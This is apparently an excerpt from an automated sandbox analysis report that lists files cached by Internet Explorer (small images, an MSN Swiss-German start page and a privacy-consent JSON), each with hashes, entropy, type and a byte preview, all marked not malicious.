Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1131
Entropy (8bit):	7.767634475904567
Encrypted:	false
SSDEEP:	24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
MD5:	D1495662336B0F1575134D32AF5D670A
SHA1:	EF841C80BB68056D4EF872C3815B33F147CA31A8
SHA-256:	8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
SHA-512:	964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
Malicious:	false
Preview:	.PNG........IHDR................U....pHYs..........+......IDATx..U=l.E.~3;w{..#].Dg!.SD...p...E....PEJ.......B4.RE. :h..B.0.-$.D"Q 8.(.;.r.{3...d...G......7o..9....vQ.+...Q......."!#I......x\|...\...& .T6..~......Mr.d.....K..&..}.m.c.....`.`....AAA..,.F.?.v..Zk;...G...r7!..z......^K...z.........y...._..E..S....!$...0...u.-.Yp...@;;;%BQa.j..A.<)..k..N.....9.?..]t.Y.`....o....[.~~..u.sX.L..tN..m1...u...........Ic....,7..(..&...t.Ka.]..,.T..g.."...W......q....:+t.?6....A..}...3h.BM/.......<.~..A.`m...:.....H...7.....{.....$... AL..^-...?5FA7'q..8jue........?A...v..0...aS.:.0.%.%"......[.=a......X..j..<725.C..@.\. ..`.._....'...=....+.Sz.{......JK.A...C\|{.\|r.$.=Y.#5.K6.!........d.G...{......$.-D.z..{...@.!d.e...&..o...$Y...v.1.....w..(U...iyWg.$...\>..].N...L.n=.[.....QeVe..&h...`;=.w.e9..}a=.......(.A&..#.jM~4.1.sH.%...h...Z2".........RP....&.3................a..&.I...y.m...XJK..'...a......!.d.......Tf.yLo8.+.+...KcZ.....\|K..T....vd....cH.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1fZUdQ[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	23808
Entropy (8bit):	7.907726359154108
Encrypted:	false
SSDEEP:	384:IXNy2qYizpa2htnE3rBUJhG2iHIOyT5CGmIsEezY1YNHVVxcGiaJ4eFj4ha/2o6w:IXNszpaWI92iHIeiecCHLxcZ1eGk/wkN
MD5:	D4F438D57AA9D35A6C06A24BC53AF585
SHA1:	1C324B3A7F38D1A22C12A5F3F2CDC50DA0C343B5
SHA-256:	4DB59DAFA301318C340ADDD5A15EAA30BA57F9DDBC97655DB338C39CEF23C024
SHA-512:	11E8F9857E5AC7973A062762C0EB37294222703D0523682939F18739A1F53627D8B9FA46BE90F2B10FF64DC16540F3BB5B12BF747A80066CE33626DB0BAE0474
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...d....CJ).(.'.V...^._.h.0[8"...@.u..'.4........Q}F.....q...,(\|w.1.=.8.......I.S..S.@..})...3..J(.\|.@..P..z..dP..L..@.4.3@.......h....7P!.......S...........(..BR....tp.....1.P1.0....... ...s.S.#..~....4....5..n....w_..A.r....H.x..(.....).F.."S....Ke.cOz.r.[....zi..y,p)..8{...H..U..2&n....4.(..;b....T!.4.1.C..M....H/4.&.....:....1..@.cL.y.lb.......4....!......@...E&.GZ.$.p......g

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1g8IBy[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	10925
Entropy (8bit):	7.951990058794173
Encrypted:	false
SSDEEP:	192:Qo+MZy3T903vE2xVM10xNRUB054Zzey7xb18S2UU0LKq084:b+ME+3nM107RUKeZzeUFwZq084
MD5:	B69B71E3D6012BE1060E97F5957FCD57
SHA1:	BFA36DC679F2BABDE52A223156BC91D1C6472E0C
SHA-256:	F718FE31398B5D39CDD542643A30C303526FB0C13DA45EBA99D2871948F08C68
SHA-512:	4853383FF3B0884187BA45C79A9610855C6DB6226E40C875A1AF98E5AADE7A405651C0BA5A579FE10AF9EE104275A4950D2405E22F813D87F301ED1F9EEC3F53
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....y.I..X}...Q[P..o.Rb9{.?.$..*...G/.\c5].51'.....qOP.%...04....!..n.P..h..M&!...S..........a..;.L.oZ......L}.KBP....).d$i(vPJ..T\b.L....K...p......CQc%F.~t.is'.I4Q.......R...3p....i..n{S..IT.!...~. .......B..Gc....V."...^?.2..qt..i1....V..j..H......N}j..l.3.S.J.(t...VZ..Er..i/.....K.$...2.O...~....5.-$[..9..;2...W..p/7.Y......[[...X..Q).r!...x,i)M..&..P.1l..9.tB..y.V,"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1g9ECN[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	11021
Entropy (8bit):	7.867331919347411
Encrypted:	false
SSDEEP:	192:Q2ltlz/RxvFouswhIZO6+ZQnHuYdZshpcdUmJmL8q4hgk0or8cpYp3EcZtfonoU:NlrPvFjsURZQOzh+dUmML8q4vP8cm/F2
MD5:	DCDB1AD2486AAB15256CB29F611902EA
SHA1:	E9D58A33EE7A02C2AB1205C25DD60572D235B99B
SHA-256:	3709077EAED0259E127E4CF460A9111CE12009EBFAB09D3196A22EF8CDF80F5F
SHA-512:	DBF78C1055203C38A008E22CDD205929E4A777E865FA73BFAC1543D2FC66CEE932021A23F7F2205B00E322C53DA8203CF3D85E431603DD618FCF78250B5771E2
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..`..3....(..S.6.....,x.2D..M4.....q....3.@...@...@..w..88.......)X..X..Xb.........P..L....3..J.4...L......(......(.(.P.@..%.R-.Sq.<..&..6sBW..p... &.(..P.R.._}.'..h..#.N....x..Aq<..AS.(..V.0..}E..2[."].A....v.t..\..y.A...L.Oba!.E.$W...?.@...(.h...&).P..@.H.......p4.(....BP...@.@.....(.........$..9ji....Q.+.w...n. ;...QFY..i6&.>.+6.\|..f.-.....[..l.H.2....I.k9I..-.d..{.N.q.{#.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1g9Ii8[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	20518
Entropy (8bit):	7.965418777174943
Encrypted:	false
SSDEEP:	384:NY5PjlC8mphINqHrM0sDzrd3624UUImon2UuSbLh6idkyYhHjEvJaAR3:NYRjlC8WhaqHY0sJK27rmq2URbLuRgvv
MD5:	D645BDD6AE1A977408363A74EB1BD716
SHA1:	2EC9E248A981DAE71F267DD79143FDA85637B065
SHA-256:	7C5292B51D3BE71CA1ECD2A7BDED7FDFE1552636E3B604A952FA1DD474C8C13F
SHA-512:	598A4C59371B1CA934EDB2B4653B2C4FE7F3015717D81A88A45F73142F0A8489B75754D8B575C1899B63D221CAF971F5D7991122E74AC9DD3C492236137FBFA2
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...^5......si2...V.&6;......W47,......^..9e..x@....#z[..K.!.Y.hT...!T.Qk..nF.N.........,....0.4.I.,GcpA-......R...h....~.-...KB.x.I..{R.7E.vdl0#........ma.........f+..1...pq...-$.....ib...'.Hh..5.....Q. .......I.v...8.q.H..~.-...$...g..?.Sv..%....m\...U......`.B`.m#.H..[40...&{.... .o)U98.qN .k*....~D......?(;q.~.>.#....>a...q.~...C.>y..,....P...;I1".8....s.Z.23q5R..Z

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1g9MWF[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	8083
Entropy (8bit):	7.919505732498027
Encrypted:	false
SSDEEP:	192:QoGRkGRxl4KtPiGpsjTk3MRcVpXGZF2DjMtnW3wD:bYkml4sPiGyI3MKXIFYQtAo
MD5:	0A09F90752D6F26A556E4C6C8AEEAB5B
SHA1:	15FF230450C62EF4A57E621D4C4B3D33871C1EF2
SHA-256:	092A548783E7B036678667B23791AE854EFA249ADE907711E8DA1BC6A4677E8C
SHA-512:	B9EC3A2D502070795FD0768F15F45C61C157BB9B3C8EEDDA4DE2B117B9629A02707C33F4BBEE2F2ADE25A12CEF6B18CC927FA95646599A4D0249489776A6C728
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..b-..Ga^.V...&m....v\.......:)?w..I.e....}.Q.v...b^..h....)...LT."..., ....0%Q.........!.S...@...E.q..Rh.D.R.L.AR2... +I. ....n.[...h..Jd2...[..AT..6....i.i....F.x.,...!...P.g[...1...;...+.W......+..H.m...;.d..K.#D\.i2.v%.*KE...D.Ld.@.....(.........$\R...!......].rj.egZ@Vu.h.J...HL.....V.f#..H..iv,...sNH..L.7G#g...)....]...9n@..OD(.uzT8&F.+62=U...<.5=F.B..,...5lQ4.^.&......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1g9eHx[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	11743
Entropy (8bit):	7.837849062366476
Encrypted:	false
SSDEEP:	192:Q2xLgFTaT+nHRx0MwUFgn1ZUkTnXwinljKPzoA6f3D0zY1Wz3sKcT8peG9pQJrnv:NxL6TaT+HRPPFQLUiwEOs081Wz3YT8gh
MD5:	09184D50AB53DF6E2AD4731A0880429D
SHA1:	7A3BFBFD18E9E0273BA2DE6C1B5454585D497E29
SHA-256:	2DB4D306FC0CEEBEDDDC80C4BE119534627BCEA3C81BB8BAC75BE6CB6BCE908A
SHA-512:	A7893331D1BB3566FADEDE0B7755AB6EC2953147A63A61B976261C40EE5D0FB7AB8EE25B48EC73F99CA3AD05AE84511A48F53217E0F749611347CBFDD8D12604
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.........(........(......(.....P.HPY..w4..O...X..>c..lv*M.ls.Q1.p.g.5-..BY/.O.w.O..M..L.....#.'VVN>..:.9"r2......Y.....O....p....UZN=..p.J."..6'.6i.Ski....bM...N...L..M..E...<...;[....._.7....t.w..G."A..=E;..zdS..r:b............@....P.@....P.@....P...@.....v..........B...R29m..wo.H.!.^.Q.jZ.Zs.r......zC.<.$................P1a.E'hA..B..E..a...\S...A.....?.i.V%..VV..H.B..X."D1..8.v..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1g9ji5[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	13727
Entropy (8bit):	7.882259886140866
Encrypted:	false
SSDEEP:	384:N2Z1dCO/k0ARHnER2m2RkN18QiAJ4r/tW4cFR+Q:N2zZ6nsJN18Tg4rY4O1
MD5:	98F850C6032EA7C6F7C27F193CC0C69C
SHA1:	8498DDD5B957F1B8186E7C0AA99C823F39A7890B
SHA-256:	46B78054535E94FC23978D2AAE33CBC5594022170C7168545BBE946F84147E08
SHA-512:	55145327F1E7067E6DD70C79C051871DB53D123147242559E434C378B4F7BD849BC2E71FA5AADA992BE69621FEA5CF1D72444C892713E9BB8600AB27E7BD5ED1
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..3VHf...inh...........=....n..Z.....n4..4.....[......`.p).RMj.....h....^...P?.lQq.`...,....\,<k.......,H....#...X...k+...oF..p...0.-..(..x..7e..vQ`.e..@.0.@..@...P...@...._q.@..%.4...H...19...........P.`..6........E..}.Cf.w...4=.+.S..2NB.l.MM.c:.Y3..._O_.&.4.#.8..=....;.v.Al..?...Y#...=.1E....@y.61....".D!.Y......,.J..o*A......MZ.N..A).u.....F..A{.P...J..KV4;S........E...@..@..4

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1g9leV[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	33450
Entropy (8bit):	7.922434092072627
Encrypted:	false
SSDEEP:	768:I/ZsacDFabvaKptEtFk/b1QKweNNEkXE+7KyVe0EkTNNxqW84:I/mRDcXN1Q3er0+7bV9EkTNNYz4
MD5:	E916667ED251988BB7945CF72195530B
SHA1:	BB5ADC78AB8AE39DD5107C0BA13A24388DCE6B62
SHA-256:	B06DE0DBA9D3A0C84BC7D22EF6520E34DC78877F544D5646D7EBEF39F31C3E92
SHA-512:	68C474D1180047A08E3363277CE8F7C19B602120A929E41864F15C49A486F57688B253721E671FD2FAB0945B2B4C2CE7E8DBE5BFB3379393FB09F75A9160D4B8
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..p.L.`.......L.4.,q(...I.2....T#....G...aL.W=....w...:..(..$...8..H.mc....kP.........[.....e.O.......,i.3XsT.LPIb.%.@.h.4...>...C2........J.#\.W...c6.s.I1.8A.sLB.(.7_....h.x<..B.....`.:..._..pq.#.(.....9....P+.P.d.'...8..5.8..L..dP.x.d..r....v........(.b.:.rh....1.Y.rs@......C.l......np...PI.!A.\P.m#.G..0.....H..,Kn.^......v(......:......P..@-.&).T......P.@....F_.P...P.[...!.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1g9xfu[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	17380
Entropy (8bit):	7.949713180979087
Encrypted:	false
SSDEEP:	384:NkesTgPpKTa0Cjn5YWb6MYCyX8w6RmzdUgnAOyv7PT:Nacx6a3jxPYD8PIU4yv
MD5:	D9A66D7D299FDE24D04CD426561361F2
SHA1:	3B7623DF599BB8A7E8FF1B4F38F01E8B6FA024F8
SHA-256:	BED8DF0C18A3500E82098826EB538830918C92E3AB457DD6FCA874B4B4066CD2
SHA-512:	0000A4F3AF011D7C71495ACCE451D8A22EC0828C2F2A12D7487095584EDF543A29A5BADA38A8B5D7C5CA981A752BCA0E4E976A17FF42B91103EB258934F95AC1
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....+../..nD.k...R..].Z.5~.p._.e=.=+..@.i.P....g.).5..u..F.....Jd..,y....h......LC.S.\|a...(p.U!.j..^...i....q.C.. .@.>.4..J`7.H..P....SLC{.).......j.7.H.U.J..5 lj.m.!...H_.....z.hT.^....].D.k..+2.)...4}..x..%Dg`......5.6..$.l..n....#.n..TH....<.9.i.A?...{G...'Q...SY..R.R'.....<..$7.y..Q...x.k...-.=...nDw.^A..........._..F?J...S..C........j..40.R.:P.....=.C......z.`

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBPfCZL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 50 x 50
Category:	dropped
Size (bytes):	2313
Entropy (8bit):	7.594679301225926
Encrypted:	false
SSDEEP:	48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
MD5:	59DAB7927838DE6A39856EED1495701B
SHA1:	A80734C857BFF8FF159C1879A041C6EA2329A1FA
SHA-256:	544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
SHA-512:	7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
Malicious:	false
Preview:	GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,\|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../\|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..\|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(\|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....TP......>...L..!T.X!.(..@a..IsgM..\|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBX2afX[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	879
Entropy (8bit):	7.684764008510229
Encrypted:	false
SSDEEP:	24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
MD5:	4AAAEC9CA6F651BE6C54B005E92EA928
SHA1:	7296EC91AC01A8C127CD5B032A26BBC0B64E1451
SHA-256:	90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
SHA-512:	09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
Malicious:	false
Preview:	.PNG........IHDR................U....pHYs..........+.....!IDATx...K.Q..wfv.u......,I"...)...z............>.OVObQ......d?\|.....F.QI$....qf.s.....">y`......{~.6.Z.`.D[&.cV`..-8i...J.S.N..xf.6@.v.(E..S.....&...T...?.X)${.....s.l."V..r...PJ!..p.4b}.=2...[......:.....LW3...A.eB.;...2...~...s_z.x\|..o....+..x....KW.G2..9.....<.\....gv...n..1..0...1}....Ht_A.x...D..5.H.......W..$_\G.e;./.1R+v....j.6v........z.k............&..(....,F.u8^..v...d-.j?.w..;..O.<9$..A..f.k.Kq9..N..p.rP2K.0.).X.4..Uh[..8..h....O..V.%.f.......G..U.m.6$......X....../.=....f:.......\|c(,.......l.\..<./..6...!...z(......# "S..f.Q.N=.0VQ._..\|....>@....P.7T.$./)s....Wy..8..xV......D....8r."b@....:.E.E......._(....4w....Ir..e-5..zjg...e?./...\|X..."!..'/......OI..J"I.MP....#...G.Vc..E..m.....wS.&.K<...Kq..\...A..$.K......,...[..D...8.?..)..3....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBi9ul[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	607
Entropy (8bit):	7.489655261883392
Encrypted:	false
SSDEEP:	12:6v/7eyLEWN8/eAcUm996kBQrNhmJLT2Y138dnIJZW5FuQZJrK:GYtvmVBQrNYEY+qAf8
MD5:	3AEADA932B138AC5F8FCF7396460A1C9
SHA1:	D2DE1CD26AC37BFCA3A389EBB10A13869F3B0B8F
SHA-256:	9402E339B739B39988F6EC83C34F29CB70E93B3C2394BBCE435E9D2AC28CF9E1
SHA-512:	BACD7B146409A59D78C0653A882A952958BD27C1C7A56EA902A8594AC92AEE91EC2A45C997FDEEF25302E73CEBFBC47565DE4B2EF7485A420419D9761942125C
Malicious:	false
Preview:	.PNG........IHDR.............;0......pHYs..........+......IDATx..V;KC1.N...ts.(trr.I..@.Ap.."...SA'A...A..nb..A..c.\...YT\|..i.r.sk{.E..i....I.&E........C..%O.Ih3Z.)y..f..$j\...V..<..X....B....n....o.0..s.k....p.....'.;...u.@Q.(Z.r...Nq1.....EQO...Kp....p.%Y{....8%..vk._.w.hWx.f.....M_..L.... ......~.8....!a.../........y).,D...J.G......6..CT...9.@...e ...Y../}.....o.... .;d.=.&...p.;v.......+i.<..T.(.yr....^k"y.u........Z..U..}`..C.g.......A.....I%[..,@-....P.V.u......t.+w.@.....v.U.%o1.i..d.O...{S.[...TX.".O % {w&.p...%Cs...8.{.B....+y.(X0.y.`.&......`..._.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	422049
Entropy (8bit):	5.4416700502706625
Encrypted:	false
SSDEEP:	3072:+JrsJU6xx+/Pky8tFI6uRhyNh/1OS0aEoX53Hk1CiyAgHJ7eLZ:+JwZO/E1ealX58CiyP7w
MD5:	AD15D3F9F9AE264B62445B18B56D4196
SHA1:	58B32D2028AE6281B75E27533CE3FEADE71DEA97
SHA-256:	E731DB00ECEFCF3F350221E5C76C75AD6E6C36A1C9CE4416807D8D7759AD7F75
SHA-512:	1C8B75E5D13E289C532A1510FC297EA52B35A038ADABFD485F7A0106AFAB70CB4C9A6F40AC8C5F3D247913C72B63E593928AC85F3C11C831BB4C0D6643FAB0A9
Malicious:	false
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210426_20541904;a:6a56ff56-7ca7-4c0f-a94a-931b31c7526c;cn:6;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 6, sn: neurope-prod-hp, dt: 2021-04-27T00:40:36.1980328Z, bt: 2021-04-26T18:37:34.8722915Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-04-09 17:02:52Z;xdmap:2021-04-28 22:28:00Z;axd:;f:msnallexpusers,muidflt11cf,muidflt47cf,audexedge1cf,audexedge2cf,bingcollabedge3cf,audexhp3cf,artgly3cf,article3cf,gallery1cf,onetrustpoplive,1s-bing-news,vebudumu04302020,bbh20200521msncf;userOptOut:false;userOptOutOptions:" data-js="{"dpi":1.0,"ddpi":1.0,"dpio":null,"forcedpi":null,"dms":6000,"ps":1000,"bds":7,"dg":"tmx.pc.ms.ie10plus",

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\de-ch[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	79096
Entropy (8bit):	5.33782687971214
Encrypted:	false
SSDEEP:	768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCxP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlcxHga7B
MD5:	15BCB7BBE03E5ABCE3162F71DADD8D63
SHA1:	2EF0AB2CC332049F5C79A7E088BD877759E93993
SHA-256:	5004E4E24FE7DCD410FE6274C514A5E49984353512A1FB0F962812065C6A381B
SHA-512:	FBAE0225579AEAF527F22914C6AC758D2D70A7870F167142D5B004A018CC454FFFDB9B2001181429FEE24012553177D929DC3FDA0CB7BB870F649DCF75561333
Malicious:	false
Preview:	{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, 